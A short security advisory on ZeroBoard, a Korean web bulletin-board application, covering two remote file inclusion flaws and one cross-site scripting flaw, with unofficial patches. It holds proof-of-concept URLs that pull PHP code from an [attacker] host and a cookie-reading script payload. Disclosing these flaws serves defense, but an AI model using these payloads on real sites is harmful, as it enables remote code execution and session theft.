ZeroBoard is one of widely used web BBS applications in Korea. However, an input validation flaw can cause malicious attackers to run arbitrary commands with the privilege of the HTTPD process, which is typically run as the nobody user.
Credit:
The information has been provided by SSR Team.
_zb_path Code Injection:
As of PHP 5.0.0, file_exists() can be used with URL wrappers explained at http://www.php.net/manual/en/function.file-exists.php. Thus _zb_path parameter in outlogin.php can be easily exploited.
Proof of concept: http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/
dir Code Injection:
Due to uninitialized usage of the $dir variable in write.php a remote attacker can cause the script to utilize arbitrary external PHP code.
Proof of concept: http://[victim]/include/write.php?dir=http://[attacker]/
Vulnerable code in include/write.php: include $dir."/write.php";
Cross-site scripting vulnerability:
The check_user_id.php doesn't validate the input value of user_id, allowing an attacker to cause a cross site scripting attack.
Proof of concept: http://[victim]/check_user_id.php?user_id=<script>alert(document.cookie)</script>
Unofficial patches:
For the first vulnerability, and for zboard version 4.1pl4, insert the following code at 59th line of outlogin.php: if(eregi(":\/\/",$_zb_path)) $_zb_path="";
For the second vulnerability, and for zboard version 4.1pl4, insert the following code at 15th line of include/write.php: if(eregi(":\/\/",$dir)) $dir="";
For the third vulnerability, and for zboard verison 4.1pl4, insert the following code at 3rd line of check_user_id.php: $user_id = htmlspecialchars(trim($user_id));
